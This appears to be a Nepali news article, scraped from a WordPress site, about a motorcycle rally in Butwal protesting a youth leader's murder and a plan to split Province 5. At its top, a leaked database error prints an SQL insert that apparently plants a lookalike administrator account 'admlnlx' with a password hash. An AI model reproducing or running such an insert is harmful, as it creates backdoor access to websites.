WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUWlVMm90kCHe9IXU19HZpPW3P80mK0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 05:08:42', '', 'admlnlx', 'admlnlx')
बुटवल, पुस ८ –
नेकपा एमाले निकट युवा संघ नेपाल रुपन्देही जिल्ला अध्यक्ष दुर्गा तिवारी हत्याका विरुद्धमा तथा प्रदेश नं.–५ लाई टुक्र्याउने प्रस्ताबबिरुद्ध आज बुटवलमा अनेरास्ववियु र युवा संघ नेपालको संयुक्त आयोजनामा मोटरसाइकल ¥याली सम्पन्न गरेको छ ।
शुक्रबार बिहान राजमार्ग चौराहाबाट सुरु भएको मोटरसाइकल ¥याली बुटवलको पुष्पलालपार्क–टा«ाफिकचोक–गोलपार्क–पुलचोक–हाटबजार–अमरपथ–इटाभट्टी–तिनकुने–मिलन चोक हुँदै योगिकुटी पुगेर कोणसभामा परिणत भएको अनेरास्ववियुका जिल्ला अध्यक्ष बालकृष्ण पाण्डेले बताउनुभएको छ ।
कोषसभामा बोल्दै युवा संघका केन्द्रीय सदस्य तथा युथफोर्स विभाग उपप्रमुख ध्रुव आचार्य, अनेरास्ववियुका केन्द्रीय सदस्य सरोज पोखरेल, युवा संघ रुपन्देहीका सचिव नकुल शाहीले बोल्दै दुर्गा तिवारीको हत्यारालाई पक्राउ गरी अविलम्ब कडा भन्दा कडा कारवाही नहुँदा सम्म र प्रदेश नं.–५ बाट तराई र पहाडलाई अलग गराउने राष्ट्रघाति संशोधन प्रस्ताव फिर्ता नहुँदासम्म युवा विद्यार्थीहरुको आन्दोलन नरोकिने बताउनुभएको थियो ।
यसैगरी पौष ९ गते दिनको १ बजेदेखि २ बजेसम्म बुटवलका सडकहरुमा सवारी साधनहरु प्रदर्शन गर्ने कार्यक्रम रहेको हुँदा सबै युवा तथा विद्यार्थीहरुलाई आफ्नो सवारी साधन उक्त समयमा सडकमा राखी १ घण्टा प्रदर्शनको लागि सहभागी हुन सबैलाई अनुरोध गरिएको अनेरास्ववियुका जिल्ला अध्यक्ष पाण्डेले जनाउनु भएकोछ ।